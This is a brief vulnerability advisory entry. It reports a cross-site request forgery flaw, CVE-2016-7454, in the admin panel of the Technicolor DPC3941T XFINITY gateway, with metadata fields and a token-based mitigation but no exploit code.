Vendor: DPC3941T
By: Ayushman Dutta
CVSS: 8 (HIGH)
CWE: 352, Cross-Site Request Forgery (CSRF)
Product Name: DPC3941T
Affected Version From: dpc3941-P20-18-v303r20421733-160413a-CMCST
Affected Version To: dpc3941-P20-18-v303r20421733-160413a-CMCST
Patch Exists: YES
Related CWE: CVE-2016-7454
CPE: h:technicolor:dpc3941t
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2016
CSRF XFINITY Gateway product Technicolor (previously Cisco) DPC3941T
The DPC3941T device is vulnerable to CSRF and has no protection against it anywhere in the admin panel. An attacker who lures the victim to a simple HTML page containing JavaScript can use it to change state in the application.
Mitigation:
Implement CSRF protection in the application, using tokens or other methods to verify the authenticity of each request.